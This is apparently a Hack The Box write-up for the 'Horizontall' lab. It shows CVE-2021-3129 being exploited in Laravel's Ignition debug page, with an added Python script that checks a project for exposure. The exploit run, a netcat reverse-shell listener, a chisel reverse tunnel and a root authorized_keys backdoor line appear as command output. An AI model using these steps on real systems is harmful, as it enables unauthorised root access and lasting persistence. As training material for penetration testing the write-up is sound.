CVE-2021-3129
A vulnerability was found in Ignition up to 2.5.1. It has been declared as critical. facade/ignition is an error page for Laravel apps. This vulnerability affects the functions file_get_contents/file_put_contents of the component Debug Mode. This is only exploitable on sites using debug mode with Laravel before 8.4.2.
The vulnerability was originally discovered by Ambionics Security, and they have put together a [[#Exploit|PoC exploit package]] below.
Exploit
The exploit itself requires a [[Horizontall_payload#PHPGGC: PHP Generic Gadget Chains|special PHP payload generator]], which was also created by Ambionics Security.
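The two preconditions named above (debug mode on, and an Ignition release before the fix) can be checked from a project's own files. The script below is an added example, not part of this write-up or of the Ambionics package: it reads a constructed `.env` and `composer.lock` and reports exposure only when both conditions hold; it checks the facade/ignition version, not the laravel/framework version.

```python
import json
import re

# First Ignition release that is not affected (the advisory: vulnerable "up to 2.5.1").
FIXED_IGNITION = (2, 5, 2)

# Constructed sample files for illustration; not taken from any real project.
SAMPLE_ENV = "APP_NAME=myproject\nAPP_ENV=production\nAPP_DEBUG=true\n"
SAMPLE_LOCK = json.dumps({"packages": [
    {"name": "laravel/framework", "version": "v8.3.0"},
    {"name": "facade/ignition", "version": "2.5.1"},
]})

def parse_env(text):
    """Minimal .env parser: KEY=value lines; skips comments and blank lines."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip('"').strip("'")
    return env

def debug_enabled(env):
    """Laravel reads APP_DEBUG as a boolean; accept the usual truthy spellings."""
    return env.get("APP_DEBUG", "false").lower() in ("true", "1", "on", "yes")

def version_tuple(version):
    """'v2.5.1' -> (2, 5, 1); tolerates a leading 'v' and trailing suffixes."""
    m = re.match(r"v?(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    # Unparseable versions (e.g. dev-master) are treated as old so they get reviewed.
    return tuple(int(part or 0) for part in m.groups()) if m else (0, 0, 0)

def installed_version(lock_text, package):
    """Locked version of `package` from composer.lock, or None if absent."""
    lock = json.loads(lock_text)
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == package:
                return pkg.get("version")
    return None

def assess(env_text, lock_text):
    """Exposed only when debug mode is on AND the installed Ignition predates the fix."""
    ignition = installed_version(lock_text, "facade/ignition")
    old = ignition is not None and version_tuple(ignition) < FIXED_IGNITION
    debug = debug_enabled(parse_env(env_text))
    return {"debug": debug, "ignition": ignition, "exposed": debug and old}
```

On a real project, call `assess(open(".env").read(), open("composer.lock").read())` from the project root; either setting APP_DEBUG=false or upgrading Ignition to 2.5.2 or later clears the "exposed" flag.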
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ python3 laravel_rce.py http://127.0.0.1:800/ payload.phar
+ log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
Launching the exploit with the generated PHAR payload
┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.105] 49026
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# hostname
horizontall
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.105 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:8e92 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:8e92 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:8e:92 txqueuelen 1000 (Ethernet)
RX packets 3105208 bytes 596740294 (596.7 MB)
RX errors 0 dropped 149 overruns 0 frame 0
TX packets 3094233 bytes 1404657384 (1.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8881400 bytes 1103573833 (1.1 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8881400 bytes 1103573833 (1.1 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
I got the shell session open.
Interestingly, the process was running as the root user, NOT the developer user.
While this appears to be the end, the connection gets cut off immediately.
Additionally, my chisel tunnel process was killed.
I would need to be quick.
SSH
strapi@horizontall:/dev/shm$ ./chiselx64 client 10.10.14.7:55555 R:800:127.0.0.1:8000
2023/04/13 20:59:19 client: Connecting to ws://10.10.14.7:55555
2023/04/13 20:59:19 client: Connected (Latency 94.772566ms)
I first re-established the tunnel
┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ python3 laravel_rce.py http://127.0.0.1:800/ payload.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
Launched the exploit again
┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.105] 49062
script /dev/null -c bash
Script started, file is /dev/null
root@horizontall:/home/developer/myproject/public# echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> /root/.ssh/authorized_keys
Upon getting a shell session open, I spawned a PTY session and wrote my public SSH key to the authorized_keys file of the root user.
The shell session was cut off immediately as expected, but that doesn't matter anymore.
Now, I can just SSH into the target system as the root user using my very own SSH key.
┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ ssh root@horizontall.htb -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Apr 13 21:00:24 UTC 2023
System load: 0.0 Processes: 193
Usage of /: 90.0% of 4.85GB Users logged in: 0
Memory usage: 49% IP address for eth0: 10.10.11.105
Swap usage: 0%
=> / is using 90.0% of 4.85GB
0 updates can be applied immediately.
Last login: Mon Aug 23 11:27:49 2021 from 10.10.14.6
root@horizontall:~# whoami
root
root@horizontall:~# hostname
horizontall
root@horizontall:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.105 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:8e92 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:8e92 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:8e:92 txqueuelen 1000 (Ethernet)
RX packets 3107512 bytes 596946706 (596.9 MB)
RX errors 0 dropped 167 overruns 0 frame 0
TX packets 3096951 bytes 1408442412 (1.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8881714 bytes 1107158126 (1.1 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8881714 bytes 1107158126 (1.1 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise